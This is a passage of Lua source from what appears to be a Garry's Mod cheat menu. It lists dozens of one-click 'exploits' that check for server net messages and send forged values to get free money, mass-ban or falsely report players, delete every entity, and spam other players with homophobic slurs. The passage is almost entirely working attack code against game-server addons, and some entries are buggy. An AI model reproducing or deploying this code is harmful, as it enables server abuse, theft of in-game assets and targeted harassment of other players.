  3380. surface.PlaySound("garrysmod/ui_click.wav")
  3381. ECNotify("Starting")
  3382. net.Start("PurchaseWeed")
  3383. net.WriteInt(tonumber(100),16)
  3384. net.WriteInt(tonumber(100),16)
  3385. net.WriteBool(LocalPlayer().Selling)
  3386. net.SendToServer()
  3387. end )
  3388. end
  3390. status = ValidNetString("DoDealerDeliver")
  3391. if (status) then
  3392. ECPrint("Found Exploit: Buy Tab [DoDealerDeliver]")
  3393. addExploit( "173","Buy Tab", "", function()
  3394. surface.PlaySound("garrysmod/ui_click.wav")
  3395. ECNotify("Starting")
  3396. if(LocalPlayer():getDarkRPVar("money")>=WEED_CONFIG.TabletPrice) then
  3397. net.Start("DoDealerDeliver")
  3398. net.WriteBool(false)
  3399. net.SendToServer()
  3400. end
  3401. end )
  3402. end
  3404. status = ValidNetString("DoDealerDeliver")
  3405. if (status) then
  3406. ECPrint("Found Exploit: Buy Bong [DoDealerDeliver]")
  3407. addExploit( "174","Buy Bong", "", function()
  3408. surface.PlaySound("garrysmod/ui_click.wav")
  3409. ECNotify("Starting")
  3410. if(LocalPlayer():getDarkRPVar("money")>=WEED_ITEMS.Items["Tools"]["bong"].price) then
  3411. net.Start("DoDealerDeliver")
  3412. net.WriteBool(true)
  3413. net.SendToServer()
  3414. end
  3415. end )
  3416. end
  3418. status = ValidNetString("sendDuelInfo")
  3419. if (status) then
  3420. ECPrint("Found Exploit: Duel NPC Exploit [sendDuelInfo]")
  3421. addExploit( "175","Duel NPC Exploit", "", function()
  3422. surface.PlaySound("garrysmod/ui_click.wav")
  3423. ECNotify("Starting")
  3424. net.Start("sendDuelInfo")
  3425. net.WriteString(table.Random(player.GetAll()):Nick())
  3426. net.WriteString("xxdddd")
  3427. net.WriteString("1e+100")
  3428. net.WriteEntity(table.random(player.GetAll()):UserID())
  3429. net.WriteInt(3,3)
  3430. net.SendToServer()
  3431. end )
  3432. end
  3434. status = ValidNetString("InviteMember")
  3435. if (status) then
  3436. ECPrint("Found Exploit: Invite all players [InviteMember]")
  3437. addExploit( "176","Invite all players", "Invite all players to your org", function()
  3438. surface.PlaySound("garrysmod/ui_click.wav")
  3439. ECNotify("Starting")
  3440. for k,v in pairs(player.GetAll()) do
  3441. net.Start("InviteMember")
  3442. net.WriteEntity(v)
  3443. net.WriteEntity(v)
  3444. net.WriteString("lol what")
  3445. net.SendToServer()
  3446. end
  3447. end )
  3448. end
  3450. status = ValidNetString("newTerritory")
  3451. if (status) then
  3452. ECPrint("Found Exploit: New Territory [newTerritory]")
  3453. addExploit( "177","New Territory", "", function()
  3454. surface.PlaySound("garrysmod/ui_click.wav")
  3455. ECNotify("Starting")
  3456. for k,v in pairs(player.GetAll()) do
  3457. net.Start("newTerritory")
  3458. net.WriteString("Hackers")
  3459. net.WriteTable(t)
  3460. net.SendToServer()
  3461. end
  3462. end )
  3463. end
  3465. status = ValidNetString("CreateOrganization")
  3466. if (status) then
  3467. ECPrint("Found Exploit: Org Exploit [CreateOrganization]")
  3468. addExploit( "178","Org Exploit", "", function()
  3469. surface.PlaySound("garrysmod/ui_click.wav")
  3470. ECNotify("Starting")
  3471. for k,v in pairs(player.GetAll()) do
  3472. net.Start("CreateOrganization")
  3473. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  3474. net.WriteString( "Join my gang or will rekt u" )
  3475. net.SendToServer()
  3476. end
  3477. end )
  3478. end
  3480. status = ValidNetString("DisbandOrganization")
  3481. if (status) then
  3482. ECPrint("Found Exploit: Org Disband [DisbandOrganization]")
  3483. addExploit( "179","Org Disband", "", function()
  3484. surface.PlaySound("garrysmod/ui_click.wav")
  3485. ECNotify("Starting")
  3486. net.Start("DisbandOrganization")
  3487. net.WriteEntity(LocalPlayer())
  3488. net.SendToServer()
  3489. end )
  3490. end
  3492. status = ValidNetString("ChangeOrgName")
  3493. if (status) then
  3494. ECPrint("Found Exploit: Org Change Name [ChangeOrgName]")
  3495. addExploit( "180","Org Change Name", "", function()
  3496. surface.PlaySound("garrysmod/ui_click.wav")
  3497. ECNotify("Starting")
  3498. net.Start("ChangeOrgName")
  3501. net.WriteEntity(LocalPlayer())
  3502. net.SendToServer()
  3503. end )
  3504. end
  3506. status = ValidNetString("IS_SubmitSID_C2S")
  3507. if (status) then
  3508. ECPrint("Found Exploit: Free Reward [IS_SubmitSID_C2S | IS_GetReward_C2S]")
  3509. addExploit( "181","Free Reward", "", function()
  3510. surface.PlaySound("garrysmod/ui_click.wav")
  3511. ECNotify("Starting")
  3512. net.Start("IS_SubmitSID_C2S")
  3513. net.WriteString("Killa")
  3514. net.SendToServer()
  3515. net.Start("IS_GetReward_C2S")
  3516. net.SendToServer()
  3517. end )
  3518. end
  3520. status = ValidNetString("AcceptBailOffer")
  3521. if (status) then
  3522. ECPrint("Found Exploit: Bail Offer Exploit [AcceptBailOffer]")
  3523. addExploit( "182","Bail Offer Exploit", "", function()
  3524. surface.PlaySound("garrysmod/ui_click.wav")
  3525. ECNotify("Starting")
  3526. for k,v in pairs(player.GetAll()) do
  3527. net.Start("AcceptBailOffer")
  3528. net.WriteEntity(v)
  3529. net.WriteUInt(-100000000000000000, 16 )
  3530. net.SendToServer()
  3531. end
  3532. end )
  3533. end
  3535. status = ValidNetString("CP_Test_Results")
  3536. if (status) then
  3537. ECPrint("Found Exploit: CP Bypass [CP_Test_Results]")
  3538. addExploit( "183","CP Bypass", "", function()
  3539. surface.PlaySound("garrysmod/ui_click.wav")
  3540. ECNotify("Starting")
  3541. net.Start("CP_Test_Results")
  3542. net.WriteInt(1 ,8)
  3543. net.SendToServer()
  3544. end )
  3545. end
  3547. status = ValidNetString("ReSpawn")
  3548. if (status) then
  3549. ECPrint("Found Exploit: Respawn #4 [ReSpawn]")
  3550. addExploit( "184","Respawn #4", "just respawn", function()
  3551. surface.PlaySound("garrysmod/ui_click.wav")
  3552. ECNotify("Starting")
  3553. net.Start("ReSpawn")
  3554. net.SendToServer()
  3555. end )
  3556. end
  3558. status = ValidNetString("FIGHTCLUB_KickPlayer")
  3559. if (status) then
  3560. ECPrint("Found Exploit: Fight Club Kick [FIGHTCLUB_KickPlayer]")
  3561. addExploit( "185","Fight Club Kick", "", function()
  3562. surface.PlaySound("garrysmod/ui_click.wav")
  3563. ECNotify("Starting")
  3564. for k,v in pairs(player.GetAll()) do
  3565. net.Start("FIGHTCLUB_KickPlayer")
  3566. net.WriteBit(v)
  3567. net.WriteEntity(v)
  3568. net.SendToServer()
  3569. end
  3570. end )
  3571. end
  3573. status = ValidNetString("FIGHTCLUB_StartFight")
  3574. if (status) then
  3575. ECPrint("Found Exploit: Fight Club Start Fight [FIGHTCLUB_StartFight]")
  3576. addExploit( "186","Fight Club Start Fight", "", function()
  3577. surface.PlaySound("garrysmod/ui_click.wav")
  3578. ECNotify("Starting")
  3579. for k,v in pairs(player.GetAll()) do
  3580. net.Start("FIGHTCLUB_StartFight")
  3581. net.WriteEntity(v)
  3582. net.SendToServer()
  3583. end
  3584. end )
  3585. end
  3587. status = ValidNetString("IveBeenRDMed")
  3588. if (status) then
  3589. ECPrint("Found Exploit: Fake RDM [IveBeenRDMed]")
  3590. addExploit( "187","Fake RDM", "", function()
  3591. surface.PlaySound("garrysmod/ui_click.wav")
  3592. ECNotify("Starting")
  3593. for k,v in pairs(player.GetAll()) do
  3594. net.Start("IveBeenRDMed")
  3595. net.WriteEntity(v)
  3596. net.SendToServer()
  3597. end
  3598. end )
  3599. end
  3601. status = ValidNetString("nCTieUpStart")
  3602. if (status) then
  3603. ECPrint("Found Exploit: Combine Control Exploit [nCTieUpStart]")
  3604. addExploit( "188","Combine Control Exploit", "", function()
  3605. surface.PlaySound("garrysmod/ui_click.wav")
  3606. ECNotify("Starting")
  3607. for k,v in pairs(ents.GetAll()) do
  3608. net.Start("nCTieUpStart")
  3609. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  3610. net.SendToServer()
  3611. end
  3612. end )
  3613. end
  3615. status = ValidNetString("DestroyTable")
  3616. if (status) then
  3617. ECPrint("Found Exploit: Fuck All [DestroyTable]")
  3618. addExploit( "189","Fuck All", "discovered by Leith", function()
  3619. surface.PlaySound("garrysmod/ui_click.wav")
  3620. ECNotify("Starting")
  3621. for k,v in pairs(ents.GetAll()) do
  3622. net.Start("DestroyTable")
  3623. net.WriteEntity(v)
  3624. net.SendToServer()
  3625. end
  3626. end )
  3627. end
  3629. status = ValidNetString("start_wd_hack")
  3630. if (status) then
  3631. ECPrint("Found Exploit: Hack Phone Exploit [start_wd_hack]")
  3632. addExploit( "190","Hack Phone Exploit", "", function()
  3633. surface.PlaySound("garrysmod/ui_click.wav")
  3634. ECNotify("Starting")
  3635. net.Start("start_wd_hack")
  3636. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  3637. net.SendToServer()
  3638. end )
  3639. end
  3641. status = ValidNetString("bringNfreeze")
  3642. if (status) then
  3643. ECPrint("Found Exploit: Ban Exploit [bringNfreeze]")
  3644. addExploit( "191","Ban Exploit", "", function()
  3645. surface.PlaySound("garrysmod/ui_click.wav")
  3646. ECNotify("Starting")
  3647. for k,v in pairs(player.GetAll()) do
  3648. net.Start('bringNfreeze')
  3649. net.WriteEntity(self)
  3650. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  3651. net.SendToServer()
  3652. end
  3653. end )
  3654. end
  3656. status = ValidNetString("JoinFirstSS")
  3657. if (status) then
  3658. ECPrint("Found Exploit: Join First SS [JoinFirstSS]")
  3659. addExploit( "192","Join First SS", "", function()
  3660. surface.PlaySound("garrysmod/ui_click.wav")
  3661. ECNotify("Starting")
  3662. net.Start("JoinFirstSS")
  3663. net.WriteEntity(LocalPlayer())
  3664. net.SendToServer()
  3665. end )
  3666. end
  3668. status = ValidNetString("unarrestPerson")
  3669. if (status) then
  3670. ECPrint("Found Exploit: Unarrest Person [unarrestPerson]")
  3671. addExploit( "193","Unarrest Person", "", function()
  3672. surface.PlaySound("garrysmod/ui_click.wav")
  3673. ECNotify("Starting")
  3674. for k,v in pairs(player.GetAll()) do
  3675. net.Start("unarrestPerson")
  3676. net.WriteEntity(v)
  3677. net.SendToServer()
  3678. end
  3679. end )
  3680. end
  3682. status = ValidNetString("giveArrestReason")
  3683. if (status) then
  3684. ECPrint("Found Exploit: Give Arrest Reason [giveArrestReason]")
  3685. addExploit( "194","Give Arrest Reason", "", function()
  3686. surface.PlaySound("garrysmod/ui_click.wav")
  3687. ECNotify("Starting")
  3688. for k,v in pairs(player.GetAll()) do
  3689. net.Start("giveArrestReason")
  3690. net.WriteEntity(LocalPlayer())
  3691. net.WriteEntity(v)
  3692. net.WriteString("Faggot")
  3693. net.SendToServer()
  3694. end
  3695. end )
  3696. end
  3698. status = ValidNetString("sellitem")
  3699. if (status) then
  3700. ECPrint("Found Exploit: Free Money #24 [sellitem]")
  3701. addExploit( "195","Free Money #24", "", function()
  3702. surface.PlaySound("garrysmod/ui_click.wav")
  3703. ECNotify("Starting")
  3704. net.Start("sellitem")
  3705. net.WriteString(self)
  3706. net.WriteEntity(LocalPlayer())
  3707. net.SendToServer()
  3708. end )
  3709. end
  3711. status = ValidNetString("createFaction")
  3712. if (status) then
  3713. ECPrint("Found Exploit: Create Faction [createFaction]")
  3714. addExploit( "196","Create Faction", "", function()
  3715. surface.PlaySound("garrysmod/ui_click.wav")
  3716. ECNotify("Starting")
  3717. for k,v in pairs(player.GetAll()) do
  3718. net.Start("createFaction")
  3719. net.WriteEntity(v)
  3721. net.SendToServer()
  3722. end
  3723. end )
  3724. end
  3726. status = ValidNetString("inviteToOrganization")
  3727. if (status) then
  3728. ECPrint("Found Exploit: Faction Invite All [inviteToOrganization]")
  3729. addExploit( "197","Faction Invite All", "", function()
  3730. surface.PlaySound("garrysmod/ui_click.wav")
  3731. ECNotify("Starting")
  3732. for k,v in pairs(player.GetAll()) do
  3733. net.Start("inviteToOrganization")
  3734. net.WriteEntity(v)
  3735. net.WriteEntity(LocalPlayer())
  3736. net.SendToServer()
  3737. end
  3738. end )
  3739. end
  3741. status = ValidNetString("GovStation_SpawnVehicle")
  3742. if (status) then
  3743. ECPrint("Found Exploit: Gov Spawn [GovStation_SpawnVehicle]")
  3744. addExploit( "198","Gov Spawn", "", function()
  3745. surface.PlaySound("garrysmod/ui_click.wav")
  3746. ECNotify("Starting")
  3747. for k,v in pairs(ents.GetAll()) do
  3748. net.Start("GovStation_SpawnVehicle")
  3749. net.WriteString("GOV_POLICE")
  3750. net.SendToServer()
  3751. end
  3752. end )
  3753. end
  3755. status = ValidNetString("GiveWeapon")
  3756. if (status) then
  3757. ECPrint("Found Exploit: Give Weapons #3 [GiveWeapon]")
  3758. addExploit( "199","Give Weapons #3", "get weapons", function()
  3759. surface.PlaySound("garrysmod/ui_click.wav")
  3760. ECNotify("Starting")
  3761. net.Start("GiveWeapon")
  3762. net.WriteEntity(LocalPlayer())
  3763. net.WriteString("m9k_davy_crockett")
  3764. net.WriteFloat(0)
  3765. net.SendToServer()
  3766. end )
  3767. end
  3769. status = ValidNetString("DailyLoginClaim")
  3770. if (status) then
  3771. ECPrint("Found Exploit: Daily Login Reward [DailyLoginClaim]")
  3772. addExploit( "200","Daily Login Reward", "", function()
  3773. surface.PlaySound("garrysmod/ui_click.wav")
  3774. ECNotify("Starting")
  3775. net.Start("DailyLoginClaim")
  3776. net.SendToServer()
  3777. end )
  3778. end
  3780. status = ValidNetString("DL_AskLogsList")
  3781. if (status) then
  3782. ECPrint("Found Exploit: Ask Log List [DL_AskLogsList]")
  3783. addExploit( "201","Ask Log List", "", function()
  3784. surface.PlaySound("garrysmod/ui_click.wav")
  3785. ECNotify("Starting")
  3786. net.Start("DL_AskLogsList")
  3787. net.SendToServer()
  3788. end )
  3789. end
  3791. status = ValidNetString("DL_StartReport")
  3792. if (status) then
  3793. ECPrint("Found Exploit: DL Report All [DL_StartReport | DL_ReportPlayer]")
  3794. addExploit( "202","DL Report All", "", function()
  3795. surface.PlaySound("garrysmod/ui_click.wav")
  3796. ECNotify("Starting")
  3797. for k,v in pairs(player.GetAll()) do
  3798. net.Start("DL_StartReport")
  3799. net.SendToServer()
  3800. net.Start("DL_ReportPlayer")
  3801. net.WriteEntity(v)
  3802. net.WriteString("Hes being a gay faggot plz ban him")
  3803. net.SendToServer()
  3804. end
  3805. end )
  3806. end
  3808. status = ValidNetString("sv_saveweapons")
  3809. if (status) then
  3810. ECPrint("Found Exploit: TTT Weapons Exploit [sv_saveweapons]")
  3811. addExploit( "203","DL Report All", "", function()
  3812. surface.PlaySound("garrysmod/ui_click.wav")
  3813. ECNotify("Starting")
  3814. net.Start("sv_saveweapons")
  3815. net.WriteString("weapon_ttt_rpg")
  3816. net.WriteString("weapon_ttt_rpg")
  3817. net.WriteString("eg")
  3818. net.SendToServer()
  3819. end )
  3820. end
  3822. status = ValidNetString("SpecDM_SendLoadout")
  3823. if (status) then
  3824. ECPrint("Found Exploit: SpecDM Exploit [SpecDM_SendLoadout]")
  3825. addExploit( "204","SpecDM Exploit", "", function()
  3826. surface.PlaySound("garrysmod/ui_click.wav")
  3827. ECNotify("Starting")
  3828. net.Start("SpecDM_SendLoadout")
  3829. net.WriteString("eg")
  3830. net.WriteString("weapon_ttt_defib")
  3831. net.SendToServer()
  3832. end )
  3833. end
  3835. status = ValidNetString("PowerRoundsForcePR")
  3836. if (status) then
  3837. ECPrint("Found Exploit: Power Rounds Force [PowerRoundsForcePR]")
  3838. addExploit( "205","Power Rounds Force", "", function()
  3839. surface.PlaySound("garrysmod/ui_click.wav")
  3840. ECNotify("Starting")
  3841. net.Start("PowerRoundsForcePR")
  3842. net.SendToServer()
  3843. end )
  3844. end
  3846. status = ValidNetString("wyozimc_playply")
  3847. if (status) then
  3848. ECPrint("Found Exploit: Wyozimc Music Exploit [wyozimc_playply]")
  3849. addExploit( "206","Wyozimc Music Exploit", "", function()
  3850. surface.PlaySound("garrysmod/ui_click.wav")
  3851. ECNotify("Starting")
  3852. for k,v in pairs(player.GetAll()) do
  3853. net.Start("wyozimc_playply")
  3854. net.WriteEntity(v)
  3855. net.WriteString("")
  3856. net.SendToServer()
  3857. end
  3858. end )
  3859. end
  3861. status = ValidNetString("SendSteamID")
  3862. if (status) then
  3863. ECPrint("Found Exploit: Send Mail's [SendSteamID]")
  3864. addExploit( "207","Send Mail's", "", function()
  3865. surface.PlaySound("garrysmod/ui_click.wav")
  3866. ECNotify("Starting")
  3867. for k,v in pairs(player.GetAll()) do
  3868. net.Start("SendSteamID")
  3869. net.WriteEntity(v)
  3870. net.WriteString("Faggot")
  3871. net.WriteString("Faggot")
  3872. net.SendToServer()
  3873. end
  3874. end )
  3875. end
  3877. status = ValidNetString("JB_GiveCubics")
  3878. if (status) then
  3879. ECPrint("Found Exploit: Give Cubics All [JB_GiveCubics]")
  3880. addExploit( "208","Give Cubics All", "", function()
  3881. surface.PlaySound("garrysmod/ui_click.wav")
  3882. ECNotify("Starting")
  3883. for k,v in pairs(player.GetAll()) do
  3884. net.Start("JB_GiveCubics")
  3885. net.WriteEntity(v)
  3886. net.WriteInt(math.floor(dwang:GetValue()), 255)
  3887. net.SendToServer()
  3888. end
  3889. end )
  3890. end
  3892. status = ValidNetString("JB_SelectWarden")
  3893. if (status) then
  3894. ECPrint("Found Exploit: Select Warden All [JB_SelectWarden]")
  3895. addExploit( "209","Select Warden All", "", function()
  3896. surface.PlaySound("garrysmod/ui_click.wav")
  3897. ECNotify("Starting")
  3898. for k,v in pairs(player.GetAll()) do
  3899. net.Start("JB_SelectWarden")
  3900. net.WriteEntity(v)
  3901. net.SendToServer()
  3902. end
  3903. end )
  3904. end
  3906. status = ValidNetString("RDMReason_Explain")
  3907. if (status) then
  3908. ECPrint("Found Exploit: RDM Explain [RDMReason_Explain]")
  3909. addExploit( "210","RDM Explain", "", function()
  3910. surface.PlaySound("garrysmod/ui_click.wav")
  3911. ECNotify("Starting")
  3912. for k,v in pairs(player.GetAll()) do
  3913. net.Start("RDMReason_Explain")
  3914. net.WriteTable({id=v, reason=fgt})
  3915. net.SendToServer()
  3916. end
  3917. end )
  3918. end
  3920. status = ValidNetString("redirectMsg")
  3921. if (status) then
  3922. ECPrint("Found Exploit: Redirect Message [redirectMsg]")
  3923. addExploit( "211","Redirect Message", "", function()
  3924. surface.PlaySound("garrysmod/ui_click.wav")
  3925. ECNotify("Starting")
  3926. net.Start("redirectMsg")
  3927. net.WriteString("Fuck you! YOUR ALL FAGGOTS!")
  3928. net.SendToServer()
  3929. end )
  3930. end
  3932. status = ValidNetString("LB_AddBan")
  3933. if (status) then
  3934. ECPrint("Found Exploit: LB Ban [LB_AddBan]")
  3935. addExploit( "212","LB Ban", "", function()
  3936. surface.PlaySound("garrysmod/ui_click.wav")
  3937. ECNotify("Starting")
  3938. for k,v in pairs(player.GetAll()) do
  3939. if v != LocalPlayer() then
  3940. net.Start("LB_AddBan")
  3941. net.WriteString("STEAM_0:0:71238382")
  3942. net.WriteString("fgt")
  3943. net.SendToServer()
  3944. end
  3945. end
  3946. end )
  3947. end
  3949. status = ValidNetString("GET_Admin_MSGS")
  3950. if (status) then
  3951. ECPrint("Found Exploit: Brass Admin Chat [GET_Admin_MSGS | OPEN_ADMIN_CHAT]")
  3952. addExploit( "213","Brass Admin Chat", "", function()
  3953. surface.PlaySound("garrysmod/ui_click.wav")
  3954. ECNotify("Starting")
  3955. net.Start("GET_Admin_MSGS")
  3956. net.SendToServer()
  3957. net.Start("OPEN_ADMIN_CHAT")
  3958. net.SendToServer()
  3959. end )
  3960. end
  3962. status = ValidNetString("br_send_pm")
  3963. if (status) then
  3964. ECPrint("Found Exploit: Brass Email Send All [br_send_pm]")
  3965. addExploit( "214","Brass Email Send All", "", function()
  3966. surface.PlaySound("garrysmod/ui_click.wav")
  3967. ECNotify("Starting")
  3968. for k,v in pairs(player.GetAll()) do
  3969. if v != LocalPlayer() then
  3970. net.Start("br_send_pm")
  3971. net.WriteString(v)
  3972. net.WriteString("FGT")
  3973. net.WriteEntity(v)
  3974. net.SendToServer()
  3975. end
  3976. end
  3977. end )
  3978. end
  3980. status = ValidNetString("LAWYER.BailFelonOut")
  3981. if (status) then
  3982. ECPrint("Found Exploit: Bail Felon Out [LAWYER.BailFelonOut]")
  3983. addExploit( "215","Bail Felon Out", "", function()
  3984. surface.PlaySound("garrysmod/ui_click.wav")
  3985. ECNotify("Starting")
  3986. net.Start("LAWYER.BailFelonOut")
  3987. net.WriteString("1")
  3988. net.WriteString("fgt")
  3989. net.SendToServer()
  3990. end )
  3991. end
  3993. status = ValidNetString("LAWYER.GetBailOut")
  3994. if (status) then
  3995. ECPrint("Found Exploit: Get Bail Out [LAWYER.GetBailOut]")
  3996. addExploit( "216","Get Bail Out", "", function()
  3997. surface.PlaySound("garrysmod/ui_click.wav")
  3998. ECNotify("Starting")
  3999. net.Start("LAWYER.GetBailOut")
  4000. net.WriteString("Mick")
  4001. net.WriteString("Mick")
  4002. net.WriteString("1000000")
  4003. net.SendToServer()
  4004. end )
  4005. end
  4007. status = ValidNetString("GrabMoney")
  4008. if (status) then
  4009. ECPrint("Found Exploit: Get Bail Out [GrabMoney]")
  4010. addExploit( "217","Get Bail Out", "", function()
  4011. surface.PlaySound("garrysmod/ui_click.wav")
  4012. ECNotify("Starting")
  4013. for k,v in pairs(ents.GetAll()) do
  4014. if v:GetClass() == "gold" then
  4015. if v:GetClass() == "silver" then
  4016. if v:GetClass() == "vip" then
  4017. if v:GetClass() == "vipgold" then
  4018. net.Start("GrabMoney")
  4019. net.WriteEntity(LocalPlayer())
  4020. net.SendToServer()
  4021. end
  4022. end
  4023. end
  4024. end
  4025. end
  4026. end )
  4027. end
  4029. status = ValidNetString("nox_addpremadepunishment")
  4030. if (status) then
  4031. ECPrint("Found Exploit: Nox Ban [nox_addpremadepunishment]")
  4032. addExploit( "218","Nox Ban", "", function()
  4033. surface.PlaySound("garrysmod/ui_click.wav")
  4034. ECNotify("Starting")
  4035. for k,v in pairs(player.GetAll()) do
  4036. if v != LocalPlayer() then
  4037. net.Start("nox_addpremadepunishment")
  4038. net.WriteEntity("Sun")
  4039. net.WriteUInt(2, 8)
  4040. net.SendToServer()
  4041. end
  4042. end
  4043. end )
  4044. end
  4046. status = ValidNetString("NET_CR_TakeStoredMoney")
  4047. if (status) then
  4048. ECPrint("Found Exploit: Steal Registry Money [NET_CR_TakeStoredMoney]")
  4049. addExploit( "219","Steal Registry Money", "", function()
  4050. surface.PlaySound("garrysmod/ui_click.wav")
  4051. ECNotify("Starting")
  4052. for k,v in pairs(ents.GetAll()) do
  4053. if v:GetClass() == "ss_cash_registry" then
  4054. net.Start('NET_CR_TakeStoredMoney')
  4055. net.WriteEntity("ss_cash_registry")
  4056. net.WriteEntity(LocalPlayer())
  4057. net.SendToServer()
  4058. end
  4059. end
  4060. end )
  4061. end
  4063. status = ValidNetString("HV_AmmoBuy")
  4064. if (status) then
  4065. ECPrint("Found Exploit: HV Free Ammo [HV_AmmoBuy]")
  4066. addExploit( "220","HV Free Ammo", "", function()
  4067. surface.PlaySound("garrysmod/ui_click.wav")
  4068. ECNotify("Starting")
  4069. net.Start("HV_AmmoBuy")
  4070. net.WriteFloat("2")
  4071. net.SendToServer()
  4072. net.Start("HV_AmmoBuy")
  4073. net.WriteFloat("1")
  4074. net.SendToServer()
  4075. end )
  4076. end
  4078. status = ValidNetString("hitcomplete")
  4079. if (status) then
  4080. ECPrint("Found Exploit: Super RP Hit [hitcomplete]")
  4081. addExploit( "221","Super RP Hit", "", function()
  4082. surface.PlaySound("garrysmod/ui_click.wav")
  4083. ECNotify("Starting")
  4084. for k,v in pairs(player.GetAll()) do
  4085. if v != LocalPlayer() then
  4086. net.Start("hitcomplete")
  4087. net.WriteEntity(v)
  4088. net.SendToServer()
  4089. end
  4090. end
  4091. end )
  4092. end
  4094. status = ValidNetString("SyncRemoveAction")
  4095. if (status) then
  4096. ECPrint("Found Exploit: Remove All [SyncRemoveAction]")
  4097. addExploit( "222","Remove All", "", function()
  4098. surface.PlaySound("garrysmod/ui_click.wav")
  4099. ECNotify("Starting")
  4100. for k,v in pairs(ents.GetAll()) do
  4101. net.Start("SyncRemoveAction")
  4102. net.WriteEntity(v)
  4103. net.SendToServer()
  4104. end
  4105. end )
  4106. end
  4108. status = ValidNetString("TMC_NET_MakePlayerWanted")
  4109. if (status) then
  4110. ECPrint("Found Exploit: Make All Wanted [TMC_NET_MakePlayerWanted]")
  4111. addExploit( "223","Make All Wanted", "", function()
  4112. surface.PlaySound("garrysmod/ui_click.wav")
  4113. ECNotify("Starting")
  4114. for k,v in pairs(player.GetAll()) do
  4115. net.Start("TMC_NET_MakePlayerWanted")
  4116. net.WriteString("bad")
  4117. net.WriteString("bad")
  4118. net.SendToServer()
  4119. end
  4120. end )
  4121. end
  4123. status = ValidNetString("thiefnpc")
  4124. if (status) then
  4125. ECPrint("Found Exploit: Thief NPC [thiefnpc]")
  4126. addExploit( "224","Thief NPC", "", function()
  4127. surface.PlaySound("garrysmod/ui_click.wav")
  4128. ECNotify("Starting")
  4129. net.Start('thiefnpc')
  4130. net.WriteDouble(-99999999999999999)
  4131. net.SendToServer()
  4132. end )
  4133. end
  4135. status = ValidNetString("TMC_NET_FirePlayer")
  4136. if (status) then
  4137. ECPrint("Found Exploit: Fire Player [TMC_NET_FirePlayer]")
  4138. addExploit( "225","Fire Player", "", function()
  4139. surface.PlaySound("garrysmod/ui_click.wav")
  4140. ECNotify("Starting")
  4141. net.Start("TMC_NET_FirePlayer")
  4142. net.WriteString("Paypal")
  4143. net.SendToServer()
  4144. end )
  4145. end
  4147. status = ValidNetString("updateLaws")
  4148. if (status) then
  4149. ECPrint("Found Exploit: Update Laws [updateLaws]")
  4150. addExploit( "226","Update Laws", "", function()
  4151. surface.PlaySound("garrysmod/ui_click.wav")
  4152. ECNotify("Starting")
  4153. net.Start("updateLaws")
  4154. net.WriteString("Bitch")
  4155. net.SendToServer()
  4156. end )
  4157. end
  4159. status = ValidNetString("LotteryMenu")
  4160. if (status) then
  4161. ECPrint("Found Exploit: Free Money #25 [LotteryMenu]")
  4162. addExploit( "227","Free Money #25", "", function()
  4163. surface.PlaySound("garrysmod/ui_click.wav")
  4164. ECNotify("Starting")
  4165. net.Start("LotteryMenu")
  4166. net.WriteEntity(LocalPlayer())
  4167. net.WriteInt(1000000000000000000, 16)
  4168. net.SendToServer()
  4169. end )
  4170. end
  4172. status = ValidNetString("soundArrestCommit")
  4173. if (status) then
  4174. ECPrint("Found Exploit: Sound Arrest [soundArrestCommit]")
  4175. addExploit( "228","Sound Arrest", "", function()
  4176. surface.PlaySound("garrysmod/ui_click.wav")
  4177. ECNotify("Starting")
  4178. net.Start("soundArrestCommit")
  4179. net.WriteString("Shit")
  4180. net.SendToServer()
  4181. end )
  4182. end
  4184. status = ValidNetString("hoverboardpurchase")
  4185. if (status) then
  4186. ECPrint("Found Exploit: Hover Board [hoverboardpurchase]")
  4187. addExploit( "229","Hover Board", "", function()
  4188. surface.PlaySound("garrysmod/ui_click.wav")
  4189. ECNotify("Starting")
  4190. net.Start("hoverboardpurchase")
  4191. net.WriteInt(8, 32)
  4192. net.SendToServer()
  4193. end )
  4194. end
  4196. status = ValidNetString("SpawnProtection")
  4197. if (status) then
  4198. ECPrint("Found Exploit: Off Spawn Protection [SpawnProtection]")
  4199. addExploit( "230","Off Spawn Protection", "", function()
  4200. surface.PlaySound("garrysmod/ui_click.wav")
  4201. ECNotify("Starting")
  4202. net.Start("SpawnProtection")
  4203. net.WriteFloat(0)
  4204. net.SendToServer()
  4205. end )
  4206. end
  4208. status = ValidNetString("NPCShop_BuyItem")
  4209. if (status) then
  4210. ECPrint("Found Exploit: NPC Shop [NPCShop_BuyItem]")
  4211. addExploit( "231","NPC Shop", "", function()
  4212. surface.PlaySound("garrysmod/ui_click.wav")
  4213. ECNotify("Starting")
  4214. net.Start("NPCShop_BuyItem")
  4215. net.WriteString("weapon_hack_phone")
  4216. net.SendToServer()
  4217. end )
  4218. end
  4220. status = ValidNetString("CubeRiot CaptureZone Update")
  4221. if (status) then
  4222. ECPrint("Found Exploit: CubeRiot Exploit [CubeRiot CaptureZone Update]")
  4223. addExploit( "232","CubeRiot Exploit", "", function()
  4224. surface.PlaySound("garrysmod/ui_click.wav")
  4225. ECNotify("Starting")
  4226. net.Start("CubeRiot CaptureZone Update")
  4227. net.WriteUInt( 1, 8 )
  4228. net.WriteVector( "2654.989258 2254.119629 -139.968750" )
  4229. net.WriteVector( "2654.989258 2254.119629 -139.968750" )
  4230. net.SendToServer()
  4231. end )
  4232. end
  4234. status = ValidNetString("deposit")
  4235. if (status) then
  4236. ECPrint("Found Exploit: Free Money #26 [deposit]")
  4237. addExploit( "233","Free Money #26", "", function()
  4238. surface.PlaySound("garrysmod/ui_click.wav")
  4239. ECNotify("Starting")
  4240. net.Start("deposit")
  4241. net.WriteString("-10000000000000000000000")
  4242. net.SendToServer()
  4243. end )
  4244. end
  4246. status = ValidNetString("AcceptRequest")
  4247. if (status) then
  4248. ECPrint("Found Exploit: Call Exploit [AcceptRequest]")
  4249. addExploit( "234","Call Exploit", "", function()
  4250. surface.PlaySound("garrysmod/ui_click.wav")
  4251. ECNotify("Starting")
  4252. for k,v in pairs(player.GetAll()) do
  4253. net.Start("AcceptRequest")
  4254. net.WriteEntity(v)
  4255. net.SendToServer()
  4256. end
  4257. end )
  4258. end
  4260. status = ValidNetString("Chess ClientWager")
  4261. if (status) then
  4262. ECPrint("Found Exploit: Chess Exploit [Chess ClientWager | Chess ClientResign]")
  4263. addExploit( "235","Chess Exploit", "", function()
  4264. surface.PlaySound("garrysmod/ui_click.wav")
  4265. ECNotify("Starting")
